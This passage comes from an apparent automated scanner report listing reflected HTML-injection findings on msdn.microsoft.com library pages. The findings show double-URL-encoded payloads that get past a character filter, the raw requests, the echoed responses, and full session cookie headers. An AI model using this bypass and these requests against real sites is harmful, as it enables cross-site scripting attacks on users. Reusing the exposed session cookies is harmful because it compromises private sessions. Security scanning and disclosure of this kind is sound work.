P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12d7fbc"><a>b1e36bffcd2" />
...[SNIP]...

2.28. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a56b8%2522%253e%253ca%253ec3a0e51bb21 was submitted in the REST URL parameter 1. This input was echoed as a56b8"><a>c3a0e51bb21 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usa56b8%2522%253e%253ca%253ec3a0e51bb21/library/bb726434(office.12).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa56b8"><a>c3a0e51bb21/library/bb726434(office.12)" />
...[SNIP]...

2.29. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98201%2522%253e%253ca%253e9d927c0b48e was submitted in the REST URL parameter 2. This input was echoed as 98201"><a>9d927c0b48e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library98201%2522%253e%253ca%253e9d927c0b48e/bb726434(office.12).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library98201"><a>9d927c0b48e/bb726434(office.12)" />
...[SNIP]...

2.30. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dae2f%2522%253e%253ca%253e4fee7d32026 was submitted in the REST URL parameter 3. This input was echoed as dae2f"><a>4fee7d32026 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb726434(office.12).aspxdae2f%2522%253e%253ca%253e4fee7d32026 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9231
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12).aspxdae2f"><a>4fee7d32026" />
...[SNIP]...

2.31. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871518.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16d6%2522%253e%253ca%253edf793d40793 was submitted in the REST URL parameter 1. This input was echoed as f16d6"><a>df793d40793 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usf16d6%2522%253e%253ca%253edf793d40793/library/bb871518.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf16d6"><a>df793d40793/library/bb871518" />
...[SNIP]...

2.32. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871518.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8490f%2522%253e%253ca%253e2ba8dfb9f97 was submitted in the REST URL parameter 2. This input was echoed as 8490f"><a>2ba8dfb9f97 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library8490f%2522%253e%253ca%253e2ba8dfb9f97/bb871518.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library8490f"><a>2ba8dfb9f97/bb871518" />
...[SNIP]...

2.33. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871518.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69909%2522%253e%253ca%253e23caee0588 was submitted in the REST URL parameter 3. This input was echoed as 69909"><a>23caee0588 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb871518.aspx69909%2522%253e%253ca%253e23caee0588 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871518.aspx69909"><a>23caee0588" />
...[SNIP]...

2.34. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871519.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b435%2522%253e%253ca%253e05423347fd7 was submitted in the REST URL parameter 1. This input was echoed as 8b435"><a>05423347fd7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us8b435%2522%253e%253ca%253e05423347fd7/library/bb871519.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8b435"><a>05423347fd7/library/bb871519" />
...[SNIP]...

2.35. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871519.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98e4%2522%253e%253ca%253eb5a34807f69 was submitted in the REST URL parameter 2. This input was echoed as f98e4"><a>b5a34807f69 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryf98e4%2522%253e%253ca%253eb5a34807f69/bb871519.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf98e4"><a>b5a34807f69/bb871519" />
...[SNIP]...

2.36. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871519.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54530%2522%253e%253ca%253e0117325841e was submitted in the REST URL parameter 3. This input was echoed as 54530"><a>0117325841e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb871519.aspx54530%2522%253e%253ca%253e0117325841e HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871519.aspx54530"><a>0117325841e" />
...[SNIP]...

2.37. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc295789.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c4c%2522%253e%253ca%253eee87a223ebb was submitted in the REST URL parameter 1. This input was echoed as 61c4c"><a>ee87a223ebb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us61c4c%2522%253e%253ca%253eee87a223ebb/library/cc295789.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
